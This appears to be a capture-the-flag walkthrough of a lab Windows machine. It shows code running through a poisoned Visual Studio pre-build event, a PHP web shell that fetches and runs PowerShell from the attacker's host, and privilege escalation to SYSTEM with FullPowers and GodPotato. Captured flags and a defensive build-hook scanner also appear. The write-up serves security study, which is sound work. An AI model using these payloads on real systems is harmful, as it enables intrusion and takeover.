VISUAL(NO AD)

NMAP:

# Nmap 7.94 scan initiated Sat Sep 30 15:19:00 2023 as: nmap -sCV -p80 -Pn -n -oN allports 10.10.11.234
Nmap scan report for 10.10.11.234
Host is up (0.065s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
|_http-title: Visual - Revolutionizing Visual Studio Builds

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 30 15:19:12 2023 -- 1 IP address (1 host up) scanned in 12.10 seconds

Feroxbuster Main Page output

kali@kali ~/machines/visual/nmap $ feroxbuster -u http://10.10.11.234 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt 

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.11.234
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       33w      299c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       30w      302c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       30w      335c http://10.10.11.234/css => http://10.10.11.234/css/
301      GET        9l       30w      334c http://10.10.11.234/js => http://10.10.11.234/js/
200      GET        0l        0w        0c http://10.10.11.234/submit.php
200      GET        7l       36w      336c http://10.10.11.234/js/scripts.js
200      GET        8l       29w    28898c http://10.10.11.234/assets/favicon.ico
301      GET        9l       30w      339c http://10.10.11.234/uploads => http://10.10.11.234/uploads/
301      GET        9l       30w      338c http://10.10.11.234/assets => http://10.10.11.234/assets/
403      GET       11l       47w      421c http://10.10.11.234/webalizer
200      GET      117l      555w     7534c http://10.10.11.234/
403      GET       11l       47w      421c http://10.10.11.234/phpmyadmin
200      GET    11559l    23754w   250218c http://10.10.11.234/css/styles.css
301      GET        9l       30w      335c http://10.10.11.234/CSS => http://10.10.11.234/CSS/
200      GET    11559l    23754w   250218c http://10.10.11.234/CSS/styles.css
503      GET       11l       44w      402c http://10.10.11.234/examples
301      GET        9l       30w      334c http://10.10.11.234/JS => http://10.10.11.234/JS/
301      GET        9l       30w      338c http://10.10.11.234/Assets => http://10.10.11.234/Assets/
200      GET        7l       36w      336c http://10.10.11.234/JS/scripts.js
200      GET        8l       29w    28898c http://10.10.11.234/Assets/favicon.ico
301      GET        9l       30w      339c http://10.10.11.234/Uploads => http://10.10.11.234/Uploads/
301      GET        9l       30w      335c http://10.10.11.234/Css => http://10.10.11.234/Css/
301      GET        9l       30w      334c http://10.10.11.234/Js => http://10.10.11.234/Js/
200      GET        7l       36w      336c http://10.10.11.234/Js/scripts.js
200      GET    11559l    23754w   250218c http://10.10.11.234/Css/styles.css
403      GET       11l       47w      421c http://10.10.11.234/licenses
403      GET       11l       47w      421c http://10.10.11.234/server-status
301      GET        9l       30w      339c http://10.10.11.234/UPLOADS => http://10.10.11.234/UPLOADS/
301      GET        9l       30w      338c http://10.10.11.234/ASSETS => http://10.10.11.234/ASSETS/
200      GET        8l       29w    28898c http://10.10.11.234/ASSETS/favicon.ico
403      GET       11l       47w      421c http://10.10.11.234/server-info
[####################] - 3m    172065/172065  0s      found:29      errors:625    
[####################] - 2m     43008/43008   310/s   http://10.10.11.234/ 
[####################] - 1s     43008/43008   41394/s http://10.10.11.234/css/ => Directory listing
[####################] - 0s     43008/43008   367590/s http://10.10.11.234/js/ => Directory listing
[####################] - 0s     43008/43008   537600/s http://10.10.11.234/assets/ => Directory listing
[####################] - 2m     43008/43008   312/s   http://10.10.11.234/uploads/ 
[####################] - 1s     43008/43008   42041/s http://10.10.11.234/CSS/ => Directory listing
[####################] - 0s     43008/43008   217212/s http://10.10.11.234/JS/ => Directory listing
[####################] - 0s     43008/43008   183013/s http://10.10.11.234/Assets/ => Directory listing
[####################] - 3m     43008/43008   254/s   http://10.10.11.234/Uploads/ 
[####################] - 1s     43008/43008   37926/s http://10.10.11.234/Css/ => Directory listing
[####################] - 0s     43008/43008   203829/s http://10.10.11.234/Js/ => Directory listing
[####################] - 3m     43008/43008   280/s   http://10.10.11.234/UPLOADS/

this is a PHP server
it was a page that asked for a git repo URL in order to compile a .sln file

there was an input field to put the http address from which the repo gets downloaded
I put mine, and got a response

kali@kali ~/machines/visual/nmap $ nc -nlvp 80
listening on [any] 80 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.234] 49675
GET /info/refs?service=git-upload-pack HTTP/1.1
Host: 10.10.14.12
User-Agent: git/2.41.0.windows.1
Accept: */*
Accept-Encoding: deflate, gzip, br, zstd
Pragma: no-cache
Git-Protocol: version=2

the part to get the reverse shell was tough, because I needed to create a .NET program with C# code, and that project needed to contain a command in the pre-build option, so it would be executed when the .sln solution is built; as if that were not enough, it was extremely hard to host a git repo over http, because the target always refused the connection and gave a 404, so it was hard to find a way to host it

strategy.

I found a way to host a git repo, but I needed to clone a real repo, make a bare clone of that repo path, and then do some configuration steps so that it could be served from my http server

there was a useful resource

git over http

these were the steps:

1. clone the repo

kali@kali ~/machines/visual/content/windows/kami $ git clone https://github.com/kamisw03/test2.git
Cloning into 'test2'...
remote: Enumerating objects: 19, done.
remote: Counting objects: 100% (19/19), done.
remote: Compressing objects: 100% (18/18), done.
remote: Total 19 (delta 1), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (19/19), 4.65 KiB | 4.65 MiB/s, done.
Resolving deltas: 100% (1/1), done.

2. bare clone of the repo, but locally

kali@kali ~/machines/visual/content/windows/kami $ git --bare clone /home/kali/machines/visual/content/windows/kami/test2 revshell
Cloning into 'revshell'...
done.

3. configure the repo to point to the real one, and make it servable over http

kali@kali ~/machines/visual/content/windows/kami/revshell/.git (main) $ git --bare update-server-info
kali@kali ~/machines/visual/content/windows/kami/revshell/.git (main) $ mv hooks/post-update.sample hooks/post-update

now I can host it (the clone above ended up with a regular .git directory rather than a bare repo, which is why the server is started from inside revshell/.git)

kali@kali ~/machines/visual/content/windows/kami/revshell/.git (main) $ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /info/refs?service=git-upload-pack HTTP/1.1" 200 -
127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /HEAD HTTP/1.1" 200 -
127.0.0.1 - - [01/Oct/2023 16:27:08] code 404, message File not found
127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/ca/0a9b6f1005fdcfb4e2e1e8166bbece885cd37a HTTP/1.1" 404 -
127.0.0.1 - - [01/Oct/2023 16:27:08] code 404, message File not found
127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/info/http-alternates HTTP/1.1" 404 -
127.0.0.1 - - [01/Oct/2023 16:27:08] code 404, message File not found
127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/info/alternates HTTP/1.1" 404 -
127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/info/packs HTTP/1.1" 200 -
127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/pack/pack-960ab2cf587f6a6a3244e10d42e7029d83f89e05.idx HTTP/1.1" 200 -
127.0.0.1 - - [01/Oct/2023 16:27:08] "GET /objects/pack/pack-960ab2cf587f6a6a3244e10d42e7029d83f89e05.pack HTTP/1.1" 200 -

creating the malicious .sln

create a normal project in Visual Studio
I had to use .NET 6, because that was the version the Windows target machine supports

then inject the command in the pre-build options
they are under the solution's Properties, in the Build settings


and then put any command there


now, when somebody tries to compile the solution, that command gets executed at the beginning of the build

so then I uploaded all the files to my GitHub, and followed all the steps above: clone the repo, re-clone it with the bare option, and then host it
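The defender-side counterpart to this step is to look at what a solution will run before building it. The scanner below is an added example (not code from the original write-up): it follows the project references in a .sln, parses each .csproj and reports every `<Exec>` task and legacy PreBuildEvent/PostBuildEvent property; the sample solution it scans is constructed, and the keyword list used to flag commands is an assumption.

```python
"""Scan a Visual Studio solution for build-time command hooks.

Added example, not code from the original write-up: it follows the project
references in a .sln, parses each .csproj and reports every place a build
runs a command (MSBuild <Exec> tasks, which is what Visual Studio emits for a
pre-build event in an SDK-style .NET 6 project, and the legacy
PreBuildEvent/PostBuildEvent properties).
"""
import re
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Assumed keyword list: commands that fetch or run code from outside the
# build tree are the ones that deserve a manual look.
SUSPICIOUS = ("powershell", "pwsh", "cmd ", "cmd.exe", "certutil", "bitsadmin",
              "curl", "wget", "iex", "downloadstring", "http://", "https://")
# Project lines in a .sln look like:
# Project("{TYPE-GUID}") = "Name", "Dir\Name.csproj", "{PROJECT-GUID}"
SLN_PROJECT_RE = re.compile(
    r'^Project\("\{[^}]+\}"\)\s*=\s*"[^"]*",\s*"([^"]+)"', re.MULTILINE)

def _local(tag):
    """Drop the XML namespace so legacy and SDK-style projects look alike."""
    return tag.rsplit("}", 1)[-1]

def scan_csproj(path):
    """Return (kind, location, command) for every command hook in one project."""
    root = ET.parse(path).getroot()
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        kind = _local(elem.tag)
        if kind == "Exec":
            # Climb to the enclosing <Target> to report when the task fires.
            target = parents.get(elem)
            while target is not None and _local(target.tag) != "Target":
                target = parents.get(target)
            where = "Target " + (target.get("Name", "?") if target is not None else "?")
            hooks = [f"{a}={target.get(a)}" for a in ("BeforeTargets", "AfterTargets")
                     if target is not None and target.get(a)]
            if hooks:
                where += " (" + ", ".join(hooks) + ")"
            findings.append(("Exec", where, elem.get("Command", "")))
        elif kind in ("PreBuildEvent", "PostBuildEvent") and (elem.text or "").strip():
            findings.append((kind, "PropertyGroup", elem.text.strip()))
    return findings

def scan_solution(sln_path):
    """Map each project path listed in the .sln to its findings."""
    sln_path = Path(sln_path)
    report = {}
    for rel in SLN_PROJECT_RE.findall(sln_path.read_text(encoding="utf-8", errors="replace")):
        proj = sln_path.parent / rel.replace("\\", "/")  # .sln paths use backslashes
        if proj.suffix.lower() == ".csproj" and proj.is_file():
            report[rel] = scan_csproj(proj)
    return report

def suspicious_commands(report):
    """Flatten the report to the findings whose command matches SUSPICIOUS."""
    return [(proj, kind, where, command)
            for proj, findings in report.items()
            for kind, where, command in findings
            if any(k in command.lower() for k in SUSPICIOUS)]

# Constructed sample: a .NET 6 console solution with one pre-build hook that
# would run PowerShell, plus a harmless legacy post-build copy.
SAMPLE_SLN = """Microsoft Visual Studio Solution File, Format Version 12.00
Project("{00000000-0000-0000-0000-000000000001}") = "ConsoleApp2", "ConsoleApp2\\ConsoleApp2.csproj", "{00000000-0000-0000-0000-000000000002}"
EndProject
"""
SAMPLE_CSPROJ = r"""<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
  </PropertyGroup>
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="powershell -nop -c &quot;Write-Output PREBUILD_PLACEHOLDER&quot;" />
  </Target>
  <PropertyGroup>
    <PostBuildEvent>copy "$(TargetPath)" "$(SolutionDir)out\"</PostBuildEvent>
  </PropertyGroup>
</Project>
"""

def build_sample(directory):
    """Write the constructed solution under `directory`; return the .sln path."""
    base = Path(directory)
    (base / "ConsoleApp2").mkdir(parents=True, exist_ok=True)
    (base / "ConsoleApp2" / "ConsoleApp2.csproj").write_text(SAMPLE_CSPROJ, encoding="utf-8")
    sln = base / "Demo.sln"
    sln.write_text(SAMPLE_SLN, encoding="utf-8")
    return sln

def demo():
    """Scan the constructed sample; returns (full report, suspicious subset)."""
    with tempfile.TemporaryDirectory() as tmp:
        report = scan_solution(build_sample(tmp))
    return report, suspicious_commands(report)
```

A build service that compiles user-supplied repositories should refuse, or at least sandbox, any solution for which `suspicious_commands` is non-empty; `scan_csproj` also works on legacy non-SDK projects because the namespace is stripped.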

kali@kali ~/machines/visual/content/windows/kami/revshell/.git (main) $ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.234 - - [01/Oct/2023 16:27:59] "GET /info/refs?service=git-upload-pack HTTP/1.1" 200 -
10.10.11.234 - - [01/Oct/2023 16:27:59] "GET /HEAD HTTP/1.1" 200 -
10.10.11.234 - - [01/Oct/2023 16:27:59] code 404, message File not found
10.10.11.234 - - [01/Oct/2023 16:27:59] "GET /objects/ca/0a9b6f1005fdcfb4e2e1e8166bbece885cd37a HTTP/1.1" 404 -
10.10.11.234 - - [01/Oct/2023 16:27:59] code 404, message File not found
10.10.11.234 - - [01/Oct/2023 16:27:59] "GET /objects/info/http-alternates HTTP/1.1" 404 -
10.10.11.234 - - [01/Oct/2023 16:27:59] code 404, message File not found
10.10.11.234 - - [01/Oct/2023 16:27:59] "GET /objects/info/alternates HTTP/1.1" 404 -
10.10.11.234 - - [01/Oct/2023 16:28:00] "GET /objects/info/packs HTTP/1.1" 200 -
10.10.11.234 - - [01/Oct/2023 16:28:00] "GET /objects/pack/pack-960ab2cf587f6a6a3244e10d42e7029d83f89e05.idx HTTP/1.1" 200 -
10.10.11.234 - - [01/Oct/2023 16:28:00] "GET /objects/pack/pack-960ab2cf587f6a6a3244e10d42e7029d83f89e05.pack HTTP/1.1" 200 -

got the shell

kali@kali ~/machines/visual/exploit $ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.234 - - [01/Oct/2023 16:28:32] "GET /ps.ps1 HTTP/1.1" 200 -
PS C:\Windows\Temp\b36ef5007abe97de121176e44bd587\ConsoleApp2> whoami
visual\enox
PS C:\Windows\Temp\b36ef5007abe97de121176e44bd587\ConsoleApp2>

grab the flag

PS C:\Users\enox> cd .\Desktop\ 
PS C:\Users\enox\Desktop> dir 


    Directory: C:\Users\enox\Desktop 


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/28/2023  11:34 AM             34 user.txt


PS C:\Users\enox\Desktop> cat .\user.txt 
4aaac8e1826c92755c629f810570bf2f 
PS C:\Users\enox\Desktop>

system info

PS C:\Users\enox\Documents> systeminfo
                                                                               
Host Name:                 VISUAL
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00429-00521-62775-AA642
Original Install Date:     6/10/2023, 10:08:12 AM
System Boot Time:          9/30/2023, 12:00:26 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,978 MB
Virtual Memory: Available: 3,509 MB
Virtual Memory: In Use:    1,290 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.11.234
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

run winpeas.

found some passwords in the xampp directory, and some notes

PS C:\xampp> cat .\passwords.txt
### XAMPP Default Passwords ### 

1) MySQL (phpMyAdmin):

  User: root
  Password:
  (means no password!)

2) FileZilla FTP:

  [ You have to create a new user on the FileZilla Interface ]  

3) Mercury (not in the USB & lite version):

  Postmaster: Postmaster (postmaster@localhost)
  Administrator: Admin (admin@localhost)

  User: newuser
  Password: wampp

4) WEBDAV:

  User: xampp-dav-unsecure
  Password: ppmax2011
  Attention: WEBDAV is not active since XAMPP Version 1.7.4.
  For activation please comment out the httpd-dav.conf and
  following modules in the httpd.conf

  LoadModule dav_module modules/mod_dav.so
  LoadModule dav_fs_module modules/mod_dav_fs.so

  Please do not forget to refresh the WEBDAV authentification (users and passwords).

going back: with this user I could put files in the web directory C:\xampp\htdocs
so what I did was just put a PHP reverse shell there and call it from the box, because there was a high probability that the user running the web server was different from the local user

so I put the PHP rev shell:

<?php system("powershell iex(new-object net.webclient).downloadstring('http://10.10.14.12/ps.ps1')"); ?>
PS C:\xampp\htdocs> dir


    Directory: C:\xampp\htdocs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/10/2023  10:32 AM                assets
d-----        6/10/2023  10:32 AM                css
d-----        6/10/2023  10:32 AM                js
d-----        10/1/2023   1:40 PM                uploads
-a----        6/10/2023   6:20 PM           7534 index.php
-a----        10/1/2023   2:49 PM            105 rev.php
-a----        6/10/2023   4:17 PM           1554 submit.php
-a----        6/10/2023   4:11 PM           4970 vs_status.php

then I just browsed to the file, and got the shell

PS C:\xampp\htdocs> whoami
nt authority\local service
PS C:\xampp\htdocs> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

but even though I did not have many privileges, I tried running C:\TOOLS\FullPowers.exe to see if it could give me all the privileges, as its GitHub repo says; so I ran it, and yes, I got all the privileges

C:\Windows\system32>whoami /priv
 
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

finally, in this part I got stuck for a bit, because I tried like 5 versions of potatoes; since I already had all the privileges they should have worked, but nope, none of them really worked. So somebody told me that a few months ago there was another potato release, which works even on Windows Server 2022, called GodPotato, so I gave it a try

GodPotato

I downloaded the release, transferred it, and it was so simple: I just created a msfvenom rev shell, put it on the machine, and executed it with GodPotato

POC


Exploit

C:\ProgramData>godp.exe -cmd "C:\TOOLS\mal.exe"
[*] CombaseModule: 0x140732319531008 
[*] DispatchTable: 0x140732321837168 
[*] UseProtseqFunction: 0x140732321213344
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\d7e99a8a-dd2f-4e7e-a503-1919d86610e6\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00008c02-1bcc-ffff-b20a-b8b3c4afe75a
[*] DCOM obj OXID: 0xf878aac315560c2a
[*] DCOM obj OID: 0x141b6a0f51adc557
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected! 
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 880 Token:0x808  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation 
[*] Find System Token : True 
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 5228

listener

kali@kali ~ $ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.234] 50434
Microsoft Windows [Version 10.0.17763.4851]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\ProgramData>whoami
whoami
nt authority\system

C:\ProgramData>type C:\users\administrator\desktop\root.txt
type C:\users\administrator\desktop\root.txt
b7254e1a5853aa50d73998d5788cc9cc

C:\ProgramData>